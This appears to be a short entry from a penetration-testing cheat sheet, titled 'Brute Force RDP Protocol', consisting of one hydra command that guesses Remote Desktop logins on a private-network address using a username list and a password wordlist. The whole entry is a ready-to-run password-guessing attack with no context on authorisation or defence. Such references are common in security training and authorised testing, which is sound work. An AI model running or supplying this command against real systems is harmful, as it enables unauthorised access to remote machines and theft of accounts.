Brute Force RDP Protocol

hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp

Last updated